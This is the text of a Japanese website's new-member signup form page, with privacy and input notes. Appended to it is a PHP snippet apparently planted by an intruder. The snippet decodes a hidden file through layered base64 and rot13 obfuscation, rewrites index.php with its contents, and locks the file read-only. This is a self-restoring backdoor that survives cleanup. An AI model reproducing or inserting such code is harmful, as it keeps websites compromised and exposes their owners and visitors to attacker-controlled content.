新規入会フォーム
- この新規入会フォームより送信いただく、個人情報の取り扱いにつきましては細心の注意を払っております。
- お預かりしたお客様の情報は本人様へのお問い合わせ内容についてのご返答や情報のご提供の目的であり、他の目的に使用することはございません。詳しくは「プライバシーポリシー」をご覧ください。
- *印の付いている項目は必須となっております。漏れなくご記入ください。
- 英数字は半角での記入をお願いいたします。
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }